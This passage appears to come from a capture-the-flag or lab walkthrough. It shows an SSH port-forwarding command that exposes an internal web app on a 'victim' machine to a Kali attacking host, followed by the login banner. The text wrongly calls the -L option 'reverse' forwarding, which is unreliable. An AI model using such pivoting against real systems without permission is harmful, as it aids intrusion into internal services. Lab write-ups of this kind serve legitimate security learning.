b) Web browser : In order to be able to see the internal webapp on our attacking machine we use a ssh reverse port forwarding technique using the ssh -L parameter. Via this method we make the port 9000 of our victim machine available on our kali machine at port 4545.

	ssh -L 4545:127.0.0.1:9000 spiderman@192.168.28.138
	spiderman@192.168.28.138's password:
	Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)

	* Documentation: https://help.ubuntu.com/
	...

	...

view raw gistfile1.txt hosted with ❤ by GitHub

Now we can access the port 9000 of the inernal web application